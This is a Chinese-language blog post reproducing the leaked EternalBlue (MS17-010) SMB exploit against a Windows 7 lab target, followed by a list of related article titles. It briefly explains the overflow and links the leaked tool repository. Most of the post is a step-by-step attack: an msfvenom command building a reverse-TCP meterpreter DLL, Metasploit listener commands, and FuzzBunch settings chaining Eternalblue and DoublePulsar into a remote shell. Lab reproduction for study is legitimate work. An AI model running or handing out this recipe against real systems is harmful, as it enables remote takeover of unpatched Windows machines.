漏洞原理

详细的漏洞原理参照文章:
http://www.91ri.org/16946.html
懒得点连接的大人们可以看这里:

首先SrvOs2FeaListToNt首先调用SrvOs2FeaListSizeToNt计算pNtFea的大小。这里注意了SrvOs2FeaListSizeToNt函数会修改原始的pOs2Fea中的Length大小,本来Length是一个DWORD, 代码还强制转换成了WORD,不能不让人联想一些事。然后以计算出来的Length来分配pNtFea.最后调用SrvOs2FeaToNt来实现转换。SrvOs2FeaToNt后面的判断就有问题了。这里还不止一个问题。
1. 转换完成后,增加pOs2FeaBody然后比较。正确的逻辑难道不应该是先判断再转换吗?
2. 由于SrvOs2FeaListSizeToNt中改变了pOs2Fea的length的值,这里使用变大后的值做比较,肯定会越界。

我也不是很能理解。。。底层代码看的不是很懂,概括一下就是:
1、某个函数在转换参数时先转换然后再判断参数长度,存在逻辑上的漏洞
2:转换参数格式时的不严谨造成了越界,造成了溢出

环境搭建

靶机:
Win7 旗舰版 x64 关闭防火墙 IP:192.168.50.137 开放445端口
攻击机A:
win7 旗舰版 x64 python2.6(32位)、对应的pywin32 IP :192.168.50.131
攻击机B:
kali2.0/任意安装了msf的linux/可以被反弹获取后门权限的设备
这里我用的是kali2.0 IP:192.168.50.130
exp下载链接:
https://github.com/misterch0c/shadowbroker

关于exp


这次的文件有三个目录,分别为“Windows”、“Swift” 和 “OddJob”,包含一堆令人震撼的黑客工具(我们挑几个重要的列举如下):
EXPLODINGCAN 是 IIS 5/6 远程漏洞利用工具
ETERNALROMANCE 是 SMB1 的重量级利用,可以攻击开放了 445 端口的 Windows XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2 并提升至系统权限,漏洞编号为MS17-010,已于 2017 年 3 月修复。
ERRATICGOPHER 、ETERNALBLUE 、ETERNALSYNERGY 、ETERNALCHAMPION 、EDUCATEDSCHOLAR、 EMERALDTHREAD 等都是 SMB 漏洞利用程序,可以攻击开放了 445 端口的 Windows 机器,且基本都已修复于 2017 年 3 月。
ESTEEMAUDIT 是 RDP 服务的远程漏洞利用工具,可以攻击开放了3389 端口且开启了智能卡登陆的 Windows XP 和 Windows 2003 机器。
FUZZBUNCH 是一个类似 MetaSploit 的漏洞利用平台。
ODDJOB 是无法被杀毒软件检测的 Rootkit 利用工具。
ECLIPSEDWING 是 Windows 服务器的远程漏洞利用工具,漏洞编号为MS08-067,修复于2008年。
ESKIMOROLL 是 Kerberos 的漏洞利用攻击,可以攻击开放了 88 端口的 Windows 2000/2003/2008/2008 R2 的域控制器,漏洞编号为MS14-068,修复于2014年。
复现步骤
1. 在攻击机B中生成payload因为这里我是用的是win7 64位的靶机,所以直接在msf中搜索对应的payload并生成,如果在实际的环境中想要找到对应的payload需要通过nmap去探查host的版本号等信息之后再进行payload的搜索。

$msfconsole
msf >search windows/x64/reverse_tcp
msf >show options

2. 生成payload并手动放置在攻击机A的C盘根目录下

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.50.130 LPORT=4444 -f dll > b.dll

这里设置的是反弹地址和反弹端口并将后门文件输出为b.dll,不是设置攻击机IP(划重点)
3. 攻击机B开启监听状态

$ msfconsole
msf > use exploit/multi/handler
msf > set LHOST 192.168.50.130
msf > set LPORT 4444
msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf > exploit


4.下载好的exp放在攻击机A中并在文件夹中新建文件名为listeningposts,不然会报错,原因在fb.py的代码中会有一个遍历目录,找不到会报错。

5. cmd执行fb.py,
设置默认攻击IP:192.168.50.137
设置回显IP地址:192.168.50.132
使用重定向:no
使用日志路径:no
新建一个攻击项目 name: test
PS:这里不要以纯数字设置项目名称,否则在后面运行的时候会提示no文件夹下的xml文档报错。

6. 使用Eternalblue攻击模块,设置攻击目标系统为Win7,Run Mode为FB。


7. 当看到Eternalblue Succeeded时证明模块成功运行

8. 接下来使用Doublepulsar模块,并设置protocol为SMB,选择靶机为64位,最后选择Function为RunDLL,因为我们需要执行DLL反弹才可以获得shell


9. 成功执行

10. 回到攻击机B中查看反弹的shell,执行screenshot,可以看到靶机的状态截图;执行shell,查看whoami,可以看到命令可以被执行,exp利用成功

总结

小人的博客今天开通啦,以后会不定期更新,主要也是为了个人记录,如果能和大牛交流就更好了,文笔一般且水平有限,如果有错误的地方请指出,谢谢,以后会多些更新一些技术文章,多多交流~如无意外,下一篇应该是方程式组16年关于cisio的漏洞破解复现,最后,最近看到的一句话与大家共勉:
我一直相信,每一个程序员的指尖都有改变世界的魅力【滑稽脸】

方程式 Eternalblue 漏洞利用复现相关推荐

  1. 2021-08-26 网安实验-Windows系统渗透测试之EternalBlue漏洞利用复现

    Metasploit :是一款开源的安全漏洞检测工具. fb工具目录:Shadow Brokers 公布的NSA方程式组织黑客工具包Windows部分工具,里面包含了IIS6.0.445端口.3389 ...

  2. EternalBlue漏洞利用

    请到我的博客中去看吧 https://jd1412.github.io/2019/01/15/EternalBlue漏洞利用/

  3. 永恒之蓝ms17-010漏洞利用复现

    一.永恒之蓝简述: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含"永恒之蓝"工具,"永恒之蓝&q ...

  4. st2全版本漏洞检测java,Struts2全版本漏洞利用复现(长期更新)

    本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担 事情起因 用靶场熟悉下Struts2的漏洞利用工具 注意:单纯的使用工具不能加深对漏洞的理解,熟悉漏洞原理才是重点 工具列举 Ha ...

  5. 利用永恒之蓝入侵服务器复制文件,永恒之蓝漏洞利用复现(示例代码)

    一.环境搭建: IP地址 系统信息 备注 角色 192.168.0.244 win7旗舰版(未安装MS17-010补丁版本) 需开启445端口及SMB协议 靶机 192.168.0.105 win7旗 ...

  6. 永恒之蓝(EternalBlue)漏洞利用实例

    1.升级kali-rolling a.修改更新源 vim /etc/apt/sources.list,只保留官方更新源"deb http://http.kali.org/kali kali- ...

  7. [系统安全] 八.Windows漏洞利用之CVE-2019-0708复现及防御详解

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

  8. ms_17_010漏洞利用

    ms17_010漏洞利用复现 ms17_010漏洞原理 能力有限,请参见大佬的blog:https://blog.csdn.net/luoshenwei3533/article/details/829 ...

  9. 方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记

    0x01  环境搭建 win2003 攻击机,ip:192.168.0.28 kali 攻击机,ip:192.168.0.27 win7 靶机,ip:192.168.0.14:netstat -an ...

最新文章

  1. .NET智能客户端(SmartClient)
  2. Spring事务传播
  3. 在Flutter中设置更好的Logging的指南
  4. [网络安全自学篇] 七十.WannaCry勒索病毒复现及分析(三)蠕虫传播机制分析及IDA和OD逆向
  5. vue如何过滤html标签,去除富文本中的html标签及vue、react、微信小顺序中的过滤器...
  6. 教你玩转CSS 居中
  7. Jupyter 快速入门
  8. 网站建设方案撰写需要注意哪些事项?
  9. Nginx+Tomcat无法正确获取的域名和ip地址
  10. java中的多对多关系解析_Java中多对多映射关系
  11. 上海电信光猫设置虚拟服务器,你们想要的上海电信光猫桥接+4K IPTV配置流程...
  12. android视频壁纸源码,Android 视频壁纸
  13. 计算机图形学必读的10本书
  14. 解决 Vue3.0 globalThis is note defined
  15. 程序设计基础实训报告
  16. 【vue大师晋级之路第二集:深入了解组件】第3章——自定义事件
  17. orthWind 数据库结构说明
  18. 全球与中国酒吧和夜总会市场深度研究分析报告
  19. Ethernet协议
  20. BlackShadow 黑客入侵以色列托管公司并勒索客户

热门文章

  1. 今天花了些时间捯饬了下Silverlight,可是DEBUG时出了这么个状况
  2. 教育解决方案-教育行业数字化管理如何开展?
  3. 有道云笔记网页剪报无法使用
  4. 贪心算法黑白点匹配C语言,贪心算法之——黑白点的匹配(两种实现方法)
  5. untiy 多屏显示
  6. SAP 公司间交易简介和配置
  7. VC++拾遗(1)-框架类
  8. 分布式存储系统etcd初探
  9. 蓝牙资讯|倍思发布蓝牙穿戴音箱,蓝牙新产品形态将越来越突出
  10. opencv仿射变换和透视变换门牌号实践总结